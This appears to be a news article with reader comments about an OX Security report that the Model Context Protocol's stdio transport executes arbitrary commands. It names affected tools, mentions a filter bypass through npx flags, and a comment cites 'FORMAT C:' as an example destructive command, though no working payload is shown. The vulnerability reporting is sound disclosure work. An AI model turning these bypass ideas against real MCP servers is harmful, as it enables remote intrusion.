How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

As part of the effort to push Large Language Model (LLM) ‘AI’ into more and more places, Anthropic’s Model Context Protocol (MCP) has been adopted as the standard to connect LLMs with various external tools and systems in a client-server model. A light oversight with the architecture of this protocol is that remote command execution (RCE) of arbitrary commands is effectively an essential part of its design, as covered in a recent article by [OX Security].

The details of this flaw are found in a detailed breakdown article, which applies to all implementations regardless of the programming language. Essentially the StdioServerParameters that are passed to the remote server to create a new local instance on said server can contain any command and arguments, which are executed in a server-side shell.

Essentially the issue is a lack of input sanitization, which is only the most common source of exploited CVEs. Across multiple real-world exploitation attempts on the software of LettaAI, LangFlow, Flowise and Windsurf it was possible to perform RCEs or perform local RCE in the case of the Windsurf IDE. Although Flowise had implemented some input sanitization by limiting allowed commands and the stripping of special characters, this was bypassed by using standard flags of the npx command.

After contacting Anthropic to inform them of these issues with MCP, the researchers were told that there was no design flaw and essentially had a ‘no-fix, works as designed’ hurled at them. According to Anthropic it’s the responsibility of the developer to perform input sanitization, which is interesting since they provide a range of implementations.

24 thoughts on “How Anthropic’s Model Context Protocol Allows For Easy Remote Execution

    1. urgh, thought it was a ‘something’. should have read it before so excitedly overreacting.

      BTW Hackaday, MCP is really big news! The Chinese sites like yours, are loaded with AI chatbots with MCP capabilities, and their associated projects controlling and accessing EVERYTHING!!!

  1. Yeah this is really really dumb. hurr durr the thing that lets your agents execute arbitrary stuff…lets your agents execute arbitrary stuff.

    It also has nothing to do with MCP per se, just the stdio way that it was invoked in the early days.

    1. It’s like everything in the world, risk/reward and knowing the boundaries. Just because it’s the latest buzzword changes nothing in that regard. It can be a useful tool, much like credit, but in the wrong it can mess you up.

    1. Me too…. That said, I don’t like the implications of having it’s ‘fingers’ in everything. Looks like a dictating government dream come true! More reason for just local access (no cloud) within your sphere as a company or individual. , but my guess, a lot of people won’t care and just embrace the cloud and all it’s ‘benign’ services… until it is to late.

  2. I’m struggling to understand how Anthropic or the protocol is responsible for the vulnerabilities. If a service’s configuration allows setting up calls to an executable file, it should allow you to configure any command you want. I haven’t tried but I’m under the impression that, say, you could configure the Apache HTTP daemon to run “FORMAT C:” when a PHP file is requested. This wouldn’t mean that the HTTP protocol is faulty but that you are an idiot. Even more so if your service allows a remote user to change your config files (like in the sixth vulnerability). What am I missing?

    On the other hand, this OX company works closely with the government+military+industrial cronies, the same ones with which Anthropic apparently has some misunderstandings.

    1. Apache doesn’t come with preconfigured setups to format your c:

      It’s also run with limited permissions usually.

      I think the issue is that MCP implementations do have these issues.

  3. sometimes giving arbitrary code execution to a system or entity has value. when i am hired by a new company as a developer, i am given arbitrary code execution, but, because i am trusted and trustworthy, nothing bad happens. presumably the same thinking will eventually be applied to suitably-advanced AI, especially if they are to completely replace us. i myself write code on occasion that gives arbitrary code execution to others. for example, i wrote a comprehensive reporting system that allows the execution of arbitrary PHP code. why? because i want to be able to run such code myself. obviously, you would not entrust such a system to the unscreened general public (or their AI agents).

    1. What company gives new devs arbitrary execution on prod?

      In my experience, you need to act ‘trusted and trustworthy’ for a while before they stop reviewing your code changes and the fun can begin.

      You should lock down the arbitrary reporting system better.
      Sooner or later someone you delegated authority to will give the wrong person permissions.
      Most likely that wrong person will just be a talented idiot, but could be a thief too.

      1. i usually get access the moment the production server craps the bed and i am the only one with an idea of how to fix it. sometimes it takes months for this to happen, but i’ve had it happen in the first week — typically because the last person who knew what to do rage quit

      2. Quite a lot of places actually, and most won’t really be described as companies, but they regularly give newhires not just PROD, but master keys to all the buildings as well as safes with gold bars, unlimited/unchecked use of the company helicopter/jet/mansions, etc etc.

        1. They exist…

          The silver bars are 1 gram ‘free for new investors’, the ‘mansion’/data center is a dry singlewide powered by an orange cord, the ‘jet’ is the flatulent friendly dog, the ‘heli’ is a broken $50 quad that you are responsible for fixing if you look at.

          Your job should be to avoid these employers.

          Also Prod is in MySQL (or forks).

          HackADay is, apparently, such an organization.

  4. The problem is people who have zero experience as a sysadmin are exposing production systems to what is essentially RCE-aaS and there are now tens of thousands of services that have essentially compromised themselves because the CEO wants to AI.

  5. This is primarily why agentic interaction with OS is a major security nightmare. The solution of course is to run your LLM locally, however this wont stop your $30,000 super GPU system from running malicious commands. I think its time to admit, scaling parameter size is insufficient for LLM to interact safely with systems.

Leave a Reply

Please be kind and respectful to help make the comments section excellent. (Comment Policy)

This site uses Akismet to reduce spam. Learn how your comment data is processed.